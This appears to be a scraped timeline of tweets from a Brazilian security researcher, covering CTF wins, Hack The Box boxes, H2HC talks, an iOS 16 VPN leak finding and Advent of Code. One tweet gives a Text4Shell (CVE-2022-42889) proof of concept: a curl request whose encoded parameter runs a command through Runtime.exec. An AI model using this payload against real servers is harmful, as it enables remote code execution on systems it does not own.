Kinda hard to believe MS still believes running a program on mouse over is still a good idea. This technique was being abused on incidents I worked back in 2017. I made a fun challenge maldoc like this for the Hack The Box Cyber Apocalypse CTF 1.5 years ago.

Brand new baby, couple hours of dedication along family and work stuff, some basic concepts, and trying different approaches. Nice box! Hack The Box 7h3B14ckKn1gh75 I just pwned Ambassador in Hack The Box! hackthebox.com/achievement/ma… #hackthebox #htb #cybersecurity

Not the usual content over here (not even in Portuguese), but it's impossible not to tweet about it: TINHA QUE SER ASSIM! #CONFIAnoVERDADEIRO #GoIMP Gabriel Toledo, Ricardo Prass. Fernando Alvarenga, Lincoln "fnx" lau, Vinicius Figueiredo, Ferrer, chelok1ng: Parabéns e obrigado! Que time! The Last Dance 🇧🇷

We confirm that iOS 16 does communicate with Apple services outside an active VPN tunnel. Worse, it leaks DNS requests. #Apple services that escape the VPN connection include Health, Maps, Wallet. We used Proton VPN and #Wireshark. Details in the video: #CyberSecurity #Privacy

Apache Text4Shell (CVE-2022-42889) PoC curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.get.Runtime%28%29.exec%28%5C%27%27%2E%74%72%69%6D%28%24%63%6D%64%29%2E%27%5C%27%29%7D sysdig.com/blog/cve-2022-… github.com/ClickCyber/cve…

A short H2HC lore: should you have a decentralised loudspeaker system in a club, make sure they can't be reached by the audience or feel the full force of Rick Astley

Last weekend, we had the AMAZING H2HC in São Paulo-SP. Among many deep, insightful talks, this reunion deserved a photo: 0x8Layer CTF team + friends. My very first CTF team. 0x8Layer, twice national #6, but first of all: AMAZING GUYS! #h2hc #hackers #hacktheplanet

I'll be on the panel "Developing Tomorrow’s Security Architect" at the event "Forum: Provedor de Serviços Gerenciados de Segurança MSSP Brasil - O Norte", next Friday. Free conference, Sec-related content. 🏴 Subscribe: eventbrite.co.uk/e/forum-proved… #security #hacker #spreadtheword

Nov 22/23, we from Hacking Esports had the pleasure to host and deliver a 2-days CTF at "Tempest Academy Conference", a national event held by Tempest Security Intelligence. Great collab, competitors had a great time with our boxes 😜. Thx Tempest folks, and congrats Xicoria for the 1st place!🏴

The stuff uncovered in the Twitter whistleblower report is much crazier than anything in the "Twitter files" but it's much less politically/tribally salient so it got no attention. Going to do a thread on some of the craziest things, in no particular order.

10 days late, my fault, but we'll never forget. "Just remember people like Aaron exist." 🏴‍☠️

Bora de live? O convidado da vez é Eurico Nicacio! "LIVE: EURICO NICACIO - DO OUTRO LADO DO BUG BOUNTY." Quando vai rolar? Dia 30/05/2023 Horário? Às 20:00 horas. Onde? Lá no nosso canal do YouTube. Confira através desse link: bit.ly/livecryptoroot… #cryptoroot #hacker

Pedreiro de codigo

🚨 Talk Alert! 🚨 Join us for Abusing GitHub Actions with Eurico Nicacio { h3llh0und } 🏴 at H2HC! 📅 12/14/2024 @ 10:00 AM 📍 Novotel Center in Brazil Additional details: redteamvillage.io

✅ Advent of Code 2024!

I just completed all 12 days of Advent of Code 2025! adventofcode.com #AdventOfCode